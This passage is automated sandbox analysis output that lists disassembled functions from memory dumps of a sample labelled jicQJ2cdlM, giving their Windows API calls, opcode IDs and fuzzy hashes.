• ExitProcess.KERNEL32 ref: 00A10120
Memory Dump Source
• Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
Yara matches
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
• Instruction ID: 804c5c830a48e531b4b9582118977acf6c9d543e0dfc80ceb9cf1fbbc92dc3a8
• Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
• Instruction Fuzzy Hash: F9E0B635000548ABCF15AFA4DE0AE993B69FB56F42B004524F9058B162CB79DEC2CA94
Strings
Memory Dump Source
• Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
Yara matches
Similarity
• API ID:
• String ID: .$GetProcAddress.$l
• API String ID: 0-2784972518
• Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
• Instruction ID: e7df28c795b5d5d6bb707880e7510df8e26bbd12ea004c9f38b556de3a969cf7
• Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
• Instruction Fuzzy Hash: 7B315CB6900649DFDB11CF99C880AADBBF9FF48324F14404AD441A7352D7B5EA85CBA4
APIs
• GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00A1049A,?,00000004), ref: 00A1549A
Strings
Memory Dump Source
• Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID: 11@
• API String ID: 2299586839-1785270423
• Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
• Instruction ID: d8b66797bd0f4208bb5f1d8e02ef3581b5e4a0b80a55dae2bf66a65f507165d5
• Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
• Instruction Fuzzy Hash: 92F02B31A40718FFDB016F70CD02FAE7B61EF44B12F544155FD1667190DA718D60A6C9
Memory Dump Source
• Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cda9e72bc25da6b1635b523c299a5fa0de5a927ba93022b621906e7d80f750db
• Instruction ID: 4ac827831b60bfe85137482c2a27181e9cc595fbcc224352d04797812a560731
• Opcode Fuzzy Hash: cda9e72bc25da6b1635b523c299a5fa0de5a927ba93022b621906e7d80f750db
• Instruction Fuzzy Hash: 74024D71E002299BDF14CFAAD9806AEFBF1EF48314F55416AE819E7384D734AD41CB84
Memory Dump Source
• Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 50f1f6500ce61f8077431c98347a8527c5f1f934838e9231b30eeddca4b7b1fa
• Instruction ID: a9c5759ae7df61b92ed43cdc8cad9b88bb8c7c8cbfc9b480f007d5bf29068af0
• Opcode Fuzzy Hash: 50f1f6500ce61f8077431c98347a8527c5f1f934838e9231b30eeddca4b7b1fa
• Instruction Fuzzy Hash: DF023C71E002199FDF24CFA9D9806ADF7F1EF88314F25826AD919E7281E731AD41CB90
APIs
• NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 009E2648
• PostQuitMessage.USER32(00000000), ref: 009E27EA
Memory Dump Source
• Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
Yara matches
Similarity
• API ID: MessageNtdllPostProc_QuitWindow
• String ID:
• API String ID: 4264772764-0
• Opcode ID: 1f3d487c3c03d627e5903ad7b0a4cc32456bcc0014a944db875e3b1801701b52
• Instruction ID: e049ece38686cd5f012b6d55a88741c48c64a2ce6ebc2524d92b378b655317d0
• Opcode Fuzzy Hash: 1f3d487c3c03d627e5903ad7b0a4cc32456bcc0014a944db875e3b1801701b52
• Instruction Fuzzy Hash: 33410F15A6438494E731EFA5FC15B2527B4FF64762F10253BE528CB2B2E3A28940C30E
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CDA,?,?,00000008,?,?,0043F19B,00000000), ref: 00436F0C
Memory Dump Source
• Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
• Instruction ID: 56894988d221dc275bbeb5d863802b50bab2a0c2ec5e1dae9116b4c396cbcd5f
• Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
• Instruction Fuzzy Hash: 58B15D3521060AAFD715CF28C48AB657BE0FF09364F26D659E899CF3A1C339D992CB44
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00A16F41,?,?,00000008,?,?,00A1F402,00000000), ref: 00A17173
Memory Dump Source
• Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
Yara matches
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
• Instruction ID: 1798efd3142175a1448d14991ff4714eec63c2592f28ee05d3f7335a42c4ffe5
• Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
• Instruction Fuzzy Hash: BCB16D31614608DFD715CF28C48ABA97BF1FF49364F298658E899CF2A1C335E992CB40
APIs
  • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
  • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
  • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
  • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F59
  • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F66
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B6B9
Memory Dump Source
• Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
Similarity
• API ID: ErrorLast$_free$InfoLocale
• String ID:
• API String ID: 2955987475-0
• Opcode ID: f248db6eca06ff892e51bce8bbfaaacfef81b0ccb26f5c1b1a4e2b53f037ebcf
• Instruction ID: b1e829de63a4cfdbbeb590434fbc272015d29a09e68feb3eb70f55beb1ad3412
• Opcode Fuzzy Hash: f248db6eca06ff892e51bce8bbfaaacfef81b0ccb26f5c1b1a4e2b53f037ebcf
• Instruction Fuzzy Hash: 5921B33291020A9BDB249E25CC42BBB73A8EF48314F10217BFE01DA241EB399D45CB99
APIs
  • Part of subcall function 00A12161: GetLastError.KERNEL32(?,?,00A0AA0C,?,00000000,?,00A0CE06,009E249A,00000000,?,00451F20), ref: 00A12165
  • Part of subcall function 00A12161: _free.LIBCMT ref: 00A12198
  • Part of subcall function 00A12161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A121D9
  • Part of subcall function 00A12161: _free.LIBCMT ref: 00A121C0
  • Part of subcall function 00A12161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A121CD
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A1B920
Memory Dump Source
• Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free$InfoLocale
• String ID:
• API String ID: 2955987475-0
• Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
• Instruction ID: b1efc4a4b77088c1a2b6631d9ec5f20b4c9f7a09ae6ae5eda4b040ddff93a33e
• Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
• Instruction Fuzzy Hash: 5A219F7292021AABDF24AF25DD42BFA73ACEF44710F1401BAEE01C6141EB79DD95CB60
APIs
  • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
  • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
  • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
• EnumSystemLocalesW.KERNEL32(0043B415,00000001,00000000,?,004307D5,?,0043BA42,00000000,?,?,?), ref: 0043B35F
Memory Dump Source
• Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem_free
• String ID:
• API String ID: 2016158738-0
• Opcode ID: f5690584e9ad499021b42ce56d8f8de17484a935533950cab043c7ceb3897eb3
• Instruction ID: db3c9ccc80d1476fb6d66557201e2f3895761b13365cb69cd331a803ccf2be29
• Opcode Fuzzy Hash: f5690584e9ad499021b42ce56d8f8de17484a935533950cab043c7ceb3897eb3
• Instruction Fuzzy Hash: C911063B6007019FDB189F39C8917BAB791FF88318F15442EEA8687B40D375A902C784
APIs
  • Part of subcall function 00A12161: GetLastError.KERNEL32(?,?,00A0AA0C,?,00000000,?,00A0CE06,009E249A,00000000,?,00451F20), ref: 00A12165
  • Part of subcall function 00A12161: _free.LIBCMT ref: 00A12198
  • Part of subcall function 00A12161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A121D9
• EnumSystemLocalesW.KERNEL32(0043B415,00000001,00000000,?,00A10A3C,?,00A1BCA9,00000000,?,?,?), ref: 00A1B5C6
Memory Dump Source
• Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EnumLocalesSystem_free
• String ID:
• API String ID: 2016158738-0
• Opcode ID: cce71207e2b51a43ae620771f06a8e25d222029b64e0dc1c2990edcd69b9ccff
• Instruction ID: 59295a3ba68af449e533017cd77f7208299d4f28de0bd492644a793c304de992
• Opcode Fuzzy Hash: cce71207e2b51a43ae620771f06a8e25d222029b64e0dc1c2990edcd69b9ccff
• Instruction Fuzzy Hash: 4F1129362107015FDB189F39C9A16BABB92FF84368B14442DEA4787740D371A942C750
APIs
  • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
  • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
  • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
• GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B633,00000000,00000000,?), ref: 0043B8C1
Memory Dump Source
• Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
Similarity
• API ID: ErrorLast$InfoLocale_free
• String ID:
• API String ID: 787680540-0
• Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
• Instruction ID: cee2b43c6a9fd0cc18a312a7fa4a4d5932635e218f943acbfed5d814f3d68c37
• Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
• Instruction Fuzzy Hash: 79F0F936A00215ABDB2C6A26DC067BB775CEF44754F15442AEE05A3240EB39BE4186D8
                                                                                    APIs
                                                                                      • Part of subcall function 00A12161: GetLastError.KERNEL32(?,?,00A0AA0C,?,00000000,?,00A0CE06,009E249A,00000000,?,00451F20), ref: 00A12165
                                                                                      • Part of subcall function 00A12161: _free.LIBCMT ref: 00A12198
                                                                                      • Part of subcall function 00A12161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A121D9
                                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00A1B89A,00000000,00000000,?), ref: 00A1BB28
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$InfoLocale_free
                                                                                    • String ID:
                                                                                    • API String ID: 787680540-0
                                                                                    • Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                    • Instruction ID: 5442b885b4c02470e1df8a713c8f2c1d402f4e423948e1979cdd2507a50e6a9e
                                                                                    • Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                    • Instruction Fuzzy Hash: 4FF02D32A2C1157BDB249B24CC45BFB7768EB40754F040429ED06A3584EB70FD81C6E4
                                                                                    APIs
                                                                                      • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                      • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                                                      • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                    • EnumSystemLocalesW.KERNEL32(0043B665,00000001,?,?,004307D5,?,0043BA06,004307D5,?,?,?,?,?,004307D5,?,?), ref: 0043B3D4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                    • String ID:
                                                                                    • API String ID: 2016158738-0
                                                                                    • Opcode ID: d6cb40d020c0f10101038f95f210870574939c9cf499dc93c49f7b68341f8f2e
                                                                                    • Instruction ID: 8e36b55a9bc7705faaba13b87098130e4a65547030758f83ed228488c18c5ef1
                                                                                    • Opcode Fuzzy Hash: d6cb40d020c0f10101038f95f210870574939c9cf499dc93c49f7b68341f8f2e
                                                                                    • Instruction Fuzzy Hash: BCF0C2362003045FDB145F3A9C92B6A7B95EF88768F15852EFE468B650D7B59C02C684
                                                                                    APIs
                                                                                      • Part of subcall function 00A12161: GetLastError.KERNEL32(?,?,00A0AA0C,?,00000000,?,00A0CE06,009E249A,00000000,?,00451F20), ref: 00A12165
                                                                                      • Part of subcall function 00A12161: _free.LIBCMT ref: 00A12198
                                                                                      • Part of subcall function 00A12161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A121D9
                                                                                    • EnumSystemLocalesW.KERNEL32(0043B665,00000001,?,?,00A10A3C,?,00A1BC6D,00A10A3C,?,?,?,?,?,00A10A3C,?,?), ref: 00A1B63B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                    • String ID:
                                                                                    • API String ID: 2016158738-0
                                                                                    • Opcode ID: 8a71536dd7903a37c32e393faf36bdd1bfe0e15f9a3a0bcd0082b4142840c2ea
                                                                                    • Instruction ID: c4b8315f7969c96f40a3376eb865b3228c68da5ccce4838359f1da998a980da8
                                                                                    • Opcode Fuzzy Hash: 8a71536dd7903a37c32e393faf36bdd1bfe0e15f9a3a0bcd0082b4142840c2ea
                                                                                    • Instruction Fuzzy Hash: AAF046363007045FDB149F39CC81BBA7B91EF80768F15402DFA058B690E7B1DC828714
                                                                                    APIs
                                                                                      • Part of subcall function 0042E40D: EnterCriticalSection.KERNEL32(?,?,00431C9A,?,00457A38,00000008,00431D68,?,?,?), ref: 0042E41C
                                                                                    • EnumSystemLocalesW.KERNEL32(00434DA7,00000001,00457BB8,0000000C), ref: 00434E25
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                    • String ID:
                                                                                    • API String ID: 1272433827-0
                                                                                    • Opcode ID: 7994b66f8d059e0a4ea4c0566bc6fd84287e6518e046040a995cb3296bdf7f9b
                                                                                    • Instruction ID: 31781df083fb6f98b94d2300e169204e9eab98a1842135cb0ce39f8875023ccf
                                                                                    • Opcode Fuzzy Hash: 7994b66f8d059e0a4ea4c0566bc6fd84287e6518e046040a995cb3296bdf7f9b
                                                                                    • Instruction Fuzzy Hash: 57F04F32A103009FD754EF69E906B8D77E0AB49726F10426AF910DB2E2CB7999848F49
                                                                                    APIs
                                                                                      • Part of subcall function 00A0E674: RtlEnterCriticalSection.NTDLL(00590DD4), ref: 00A0E683
                                                                                    • EnumSystemLocalesW.KERNEL32(00434DA7,00000001,00457BB8,0000000C), ref: 00A1508C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                    • String ID:
                                                                                    • API String ID: 1272433827-0
                                                                                    • Opcode ID: 91255582852f62f49bbb7f6d609e28063f3a8d390254579dd7c371b3acb579f0
                                                                                    • Instruction ID: 1b8e9ca62c5238b04c7ee440f2c01bc80b8305499b3ee761ed8e1cddbc5a60aa
                                                                                    • Opcode Fuzzy Hash: 91255582852f62f49bbb7f6d609e28063f3a8d390254579dd7c371b3acb579f0
                                                                                    • Instruction Fuzzy Hash: 2EF04F32A10304DFE710EF68E906B9D77E0AF45721F104265FA10DB2E2DB759954CB4A
                                                                                    APIs
                                                                                      • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                      • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                                                      • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                    • EnumSystemLocalesW.KERNEL32(0043B1F9,00000001,?,?,?,0043BA64,004307D5,?,?,?,?,?,004307D5,?,?,?), ref: 0043B2D9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                    • String ID:
                                                                                    • API String ID: 2016158738-0
                                                                                    • Opcode ID: 5abaff1671bb674c6eafe0f2cce25488b1c0be8fa004c8119abb9d1d27339480
                                                                                    • Instruction ID: 792a508546450a8c62dd781f30710cea9d26762123306e32df2f83f98e4bbb46
                                                                                    • Opcode Fuzzy Hash: 5abaff1671bb674c6eafe0f2cce25488b1c0be8fa004c8119abb9d1d27339480
                                                                                    • Instruction Fuzzy Hash: 62F0203A30020497CB04AF7AD85A76BBF90EBC5B54F0A409AEF098B250C6399842C798
                                                                                    APIs
                                                                                      • Part of subcall function 00A12161: GetLastError.KERNEL32(?,?,00A0AA0C,?,00000000,?,00A0CE06,009E249A,00000000,?,00451F20), ref: 00A12165
                                                                                      • Part of subcall function 00A12161: _free.LIBCMT ref: 00A12198
                                                                                      • Part of subcall function 00A12161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A121D9
                                                                                    • EnumSystemLocalesW.KERNEL32(0043B1F9,00000001,?,?,?,00A1BCCB,00A10A3C,?,?,?,?,?,00A10A3C,?,?,?), ref: 00A1B540
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                    • String ID:
                                                                                    • API String ID: 2016158738-0
                                                                                    • Opcode ID: 7e45c69b4bd48ea0a58e1bc64ad8673d17a770c848b88e6c6a4e287bad9e638c
                                                                                    • Instruction ID: 1f435fe71051086b0f98f46638e0a9440f8ffc3f51c7dca12dc4f853fcf7917d
                                                                                    • Opcode Fuzzy Hash: 7e45c69b4bd48ea0a58e1bc64ad8673d17a770c848b88e6c6a4e287bad9e638c
                                                                                    • Instruction Fuzzy Hash: AFF0553A30020457CB04AF3ADC057AABF90EFC1B60F0A0059EF0A8B250C371D882C7A0
                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00010692,0040FC1E), ref: 0041068B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID:
                                                                                    • API String ID: 3192549508-0
                                                                                    • Opcode ID: 6cf26b4471ecbc88141dfed73a91e81ad7907fcfa0cdea6a3473b6b210d5516f
                                                                                    • Instruction ID: 98c1b70154c3c6394ebbf277c14e22134dfc73ab602bc766ac458664b600bd4b
                                                                                    • Opcode Fuzzy Hash: 6cf26b4471ecbc88141dfed73a91e81ad7907fcfa0cdea6a3473b6b210d5516f
                                                                                    • Instruction Fuzzy Hash:
                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00410692,009EFE85), ref: 009F08F2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID:
                                                                                    • API String ID: 3192549508-0
                                                                                    • Opcode ID: 6cf26b4471ecbc88141dfed73a91e81ad7907fcfa0cdea6a3473b6b210d5516f
                                                                                    • Instruction ID: 98c1b70154c3c6394ebbf277c14e22134dfc73ab602bc766ac458664b600bd4b
                                                                                    • Opcode Fuzzy Hash: 6cf26b4471ecbc88141dfed73a91e81ad7907fcfa0cdea6a3473b6b210d5516f
                                                                                    • Instruction Fuzzy Hash:
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapProcess
                                                                                    • String ID:
                                                                                    • API String ID: 54951025-0
                                                                                    • Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                    • Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
                                                                                    • Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                    • Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                    • Instruction ID: b4093df590a21e34b028a8b1fc7d27a52c9cbab165512cb59d6a43ae298a81d2
                                                                                    • Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                    • Instruction Fuzzy Hash: 61324661D68F014DE7339634C822336A698AFBB3D4F15E737F859B5EA6EB28C4834105
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e46bd4f707ba7a9ceb031d9cd86521102eb103cae0c179e5e6aa0592395d1ff4
                                                                                    • Instruction ID: 8d7dcf63c468df939a74f501716ec15b8f2183c69ee07cfca9113f75d84f5853
                                                                                    • Opcode Fuzzy Hash: e46bd4f707ba7a9ceb031d9cd86521102eb103cae0c179e5e6aa0592395d1ff4
                                                                                    • Instruction Fuzzy Hash: C3E19270A08612EFD714CF24C590AAAB7F1FF44304B14456ED856ABB81D738FC61DB96
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 00d6ba4a2d84f0801e1b0a96c170955ef3db55fa66fb4acd58968073f34e18d5
                                                                                    • Instruction ID: 9500f31f2303ac19b948a61274fd077730a862ccbbb45c154d4ccc04032aef42
                                                                                    • Opcode Fuzzy Hash: 00d6ba4a2d84f0801e1b0a96c170955ef3db55fa66fb4acd58968073f34e18d5
                                                                                    • Instruction Fuzzy Hash: 4CD1E372A0C1AA0ACB6D4B39947003EBFF16A523A131E879DD4F7CA5C2ED34F954D660
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                    • Instruction ID: 80968e5e8bc017810328c9ff139e3a08396a4cd6bf5f0c598f5f88a651707172
                                                                                    • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                    • Instruction Fuzzy Hash: C691743230D0B34ADB29463DA53413FFFE15E523A139A079FE4F2CA2C5EE289954D624
                                                                                    Memory Dump Source
APIs
• DefWindowProcW.USER32(?,00000014,?,?), ref: 00402151
• GetClientRect.USER32(?,?), ref: 00402166
